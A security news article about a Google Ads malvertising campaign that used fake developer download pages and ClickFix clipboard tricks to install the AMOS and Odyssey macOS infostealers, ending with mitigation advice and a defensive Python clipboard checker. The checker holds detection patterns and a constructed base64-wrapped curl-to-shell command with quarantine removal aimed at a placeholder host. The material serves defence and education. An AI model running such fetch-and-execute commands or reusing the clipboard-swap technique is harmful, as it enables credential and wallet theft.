Threat Actors Abusing Google Ads To Deploy Odyssey And AMOS
A recent campaign demonstrates how modern malvertising, ads pointing to malicious websites, can use legitimate search channels to trick technically sophisticated users into installing powerful macOS information-stealing malware.
Operators bought Google Ads that pointed to convincing fake download pages impersonating Homebrew, LogMeIn, and TradingView, then used social-engineering "ClickFix" tricks to get targets to paste Terminal commands that installed either AMOS (Atomic macOS Stealer) or the newer Odyssey stealer.

Researchers from Hunt.io describe the campaign's playbooks as high-quality landing pages promoted in search results that convince developers and power users to run an installer command and thereby hand the attacker root-level access.
The operators crafted dozens of domains that mimicked well-known macOS developer services and tools. Hunt.io's analysis found more than 85 impersonator domains and multiple clusters of pages designed to look like genuine download portals for Homebrew and other developer software.
The threat actors then used Google Ads to promote those pages so they appeared in normal search results, increasing the chance that a developer would click a top-ranked entry and trust the page.
The malicious pages used two psychological levers. First, they matched the visual style and wording of the genuine services, lowering suspicion. Second, they presented a short "installer" step that looked like a routine command-line action, often an instruction to copy a curl or similar command into the Terminal.
When targets clicked a copy button, the campaign sometimes placed a different, base64-encoded command on the clipboard (not the harmless Cloudflare or verification text shown on screen). Pasting and running that clipboard content fetched an install.sh script, removed macOS quarantine flags, and executed a binary without the user deliberately launching an application bundle from Finder.
Because the sites were promoted through Google Ads and were visually convincing, the campaign reached users who would normally expect a top-ranked search result to be safe. The attackers also implemented common sandbox-and-analysis checks, such as altering behavior if they detect a virtual machine or analysis environment, which makes forensic inspection and automated detection much harder.
Once the installer script ran, it downloaded and launched one of two families of infostealers: AMOS (sometimes called Atomic Stealer or Atomic macOS Stealer) or the newer Odyssey stealer. Both families aim to harvest high-value data from a macOS host: browser cookies and stored credentials across Chrome, Firefox, and Safari; saved passwords and macOS Keychain items; cryptocurrency wallet extensions and private keys; and selected files by scanning for specific file extensions. Attackers typically package stolen data and exfiltrate it to command-and-control servers.
The installers frequently include pragmatic steps to reduce detection and friction: removing quarantine attributes, invoking sudo to escalate privileges, and manipulating system services. Hence, malicious processes blend in with legitimate system activity. Analysts observed the malware explicitly checking hardware and memory signatures, interacting with XPC services, and killing update daemons for cloud services to prevent interference. All these behaviors make the compromise both stealthy and persistent.
AMOS and Odyssey
AMOS has operated as Malware-as-a-Service (MaaS) since at least 2023, so its functionality and distribution keep evolving through active development and commercial availability to other threat actors.
AMOS's core capabilities include the extraction of browser-stored credentials and cookies, harvesting cryptocurrency wallet data (including common browser extensions), and exfiltrating those artifacts to attacker-controlled endpoints.
Recent variants added a backdoor module, enabling remote access and longer-term persistence beyond one-shot data theft. Researchers note that AMOS checks for analysis environments and alters its execution to avoid sandbox detection.
From a technical standpoint, AMOS commonly arrives via a shell script that decodes and downloads a Mach-O binary. The binary then attempts to disable or evade simple platform protections by clearing quarantine flags. Gatekeeper prompts are suppressed or bypassed, sudo is invoked for privileged actions, and services and processes are manipulated to hide network traffic and file activity.
The collected artifacts are compressed and uploaded to command-and-control (C2) servers under operator control.
Odyssey is a more recent family that researchers connect to the same ecosystem as Poseidon and forks of AMOS. It shares the usual infostealer goals, such as credential and cookie theft and wallet and Keychain access, but researchers observed additional techniques reflecting its evolution.
Notably, researchers found instances where Odyssey samples carried valid Apple developer signatures; in some cases, attackers abused code signing to make their binaries look legitimate and reduce friction with macOS security mechanisms. Odyssey also exhibits careful process injection behaviors and deliberate attempts to mix legitimate system APIs with malicious flows to avoid heuristic detection.
Where AMOS presents a commodified, subscription-based tool, Odyssey appears to be an actively developed fork with improvements in stealth and compatibility; both remain focused on harvest-and-exfiltrate operations. Analysts emphasize that stolen credentials and wallets are the primary payoff and that operator infrastructure, including domains and C2 servers, receives continuous updates to support multiple campaigns.
A short list of low-effort, high-impact mitigation measures can be adopted to prevent AMOS and Odyssey from ruining your day:
- Prefer official canonical pages for installers (for example, Homebrew's canonical site is brew.sh) and verify installer instructions against official docs.
- Treat any instruction that asks you to paste a command into the Terminal as suspect. Inspect copied text before running it, and, when in doubt, fetch installers from known package repositories or the vendor's site.
- Keep macOS up to date, enable built-in protections (Gatekeeper, SIP), and consider endpoint detection tools that can spot unusual process trees or exfiltration.
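The clipboard swap described above (a copy button placing a base64-wrapped command where the page showed harmless text) is exactly what the "inspect copied text before running it" advice is meant to catch. The following is an added example, not code from the article or from Hunt.io: a small Python checker that peels base64 layers off pasted text and flags the behaviours the article attributes to these installers (pipe-to-shell, quarantine removal, sudo, inline decoding). The sample clipboard content is constructed for illustration and uses the reserved example.invalid name; the script name in the usage comment is hypothetical.

```python
import base64
import re
import sys

# Behaviours the article attributes to the pasted ClickFix commands, as regexes.
SUSPICIOUS_PATTERNS = [
    ("pipe_to_shell", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("quarantine_removal", re.compile(r"\bxattr\s+-[a-z]*[cd][a-z]*\s")),
    ("privilege_escalation", re.compile(r"\bsudo\b")),
    ("inline_decode", re.compile(r"\bbase64\s+(-d|--decode|-D)\b")),
]
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def _decode_base64_runs(text):
    """Return the printable text hidden in any long base64 run inside text."""
    out = []
    for m in B64_RUN.finditer(text):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in decoded):
            out.append(decoded)
    return out

def inspect_pasted_text(text, max_depth=3):
    """Return (sorted finding labels, [text + every base64 layer peeled off it])."""
    layers, frontier = [text], [text]
    for _ in range(max_depth):  # bounded, so nested encodings cannot loop forever
        frontier = [d for chunk in frontier for d in _decode_base64_runs(chunk)]
        if not frontier:
            break
        layers.extend(frontier)
    findings = {label for layer in layers
                for label, rx in SUSPICIOUS_PATTERNS if rx.search(layer)}
    if len(layers) > 1:
        findings.add("base64_payload")
    return sorted(findings), layers

# Constructed sample (not from the campaign): the copy button puts a base64-wrapped
# installer pipeline on the clipboard; example.invalid is a reserved, non-routable name.
HIDDEN_COMMAND = ("curl -fsSL https://example.invalid/install.sh | sh; "
                  "xattr -d com.apple.quarantine ~/Downloads/Installer")
CLIPBOARD_TEXT = "echo " + base64.b64encode(HIDDEN_COMMAND.encode()).decode() + " | base64 -d | sh"

if __name__ == "__main__":  # on macOS: pbpaste | python3 inspect_clipboard.py
    text = sys.stdin.read() if not sys.stdin.isatty() else CLIPBOARD_TEXT
    findings, layers = inspect_pasted_text(text)
    print("findings:", ", ".join(findings) or "none")
    print("would actually run:", layers[-1])
```

Run without piped input it analyses the constructed sample; on a Mac, piping pbpaste into it shows what a copied "installer" line would really execute before anything is pasted into Terminal.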
The campaign shows how malvertising can scale targeted attacks without relying on traditional phishing emails. By buying legitimate ad placements and mirroring trusted services, attackers lower the barrier to compromise and reach a developer audience that often executes command-line installs as routine.
The malware families involved, a commercialized AMOS and the evolving Odyssey stealer, focus on high-value credentials and wallet theft, and they incorporate evasive and privilege-escalation techniques to increase their chances of success.
Karolis Liucveikis
PCrisk security portal is brought by a company RCS LT.
Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.
Our malware removal guides are free. However, if you want to support us you can send us a donation.